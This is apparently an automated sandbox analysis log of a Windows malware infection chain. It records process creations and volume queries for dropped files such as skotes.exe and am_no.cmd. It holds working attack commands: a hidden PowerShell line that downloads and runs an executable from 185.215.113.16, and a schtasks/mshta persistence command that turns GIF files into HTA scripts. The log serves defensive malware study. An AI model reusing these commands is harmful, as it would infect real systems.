Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Source: skotes.exe, skotes.exe, 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager
Source: 483d2fa8a0d53818306efeb32d3.exe, 0000003E.00000002.2604838529.00000000002BA000.00000040.00000001.01000000.00000015.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000004C.00000002.2709619463.00000000002BA000.00000040.00000001.01000000.00000015.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000005D.00000002.2891919929.00000000002BA000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: +!Program Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1032619001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1032619001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1032622001\Dd7mHw1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1032622001\Dd7mHw1.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
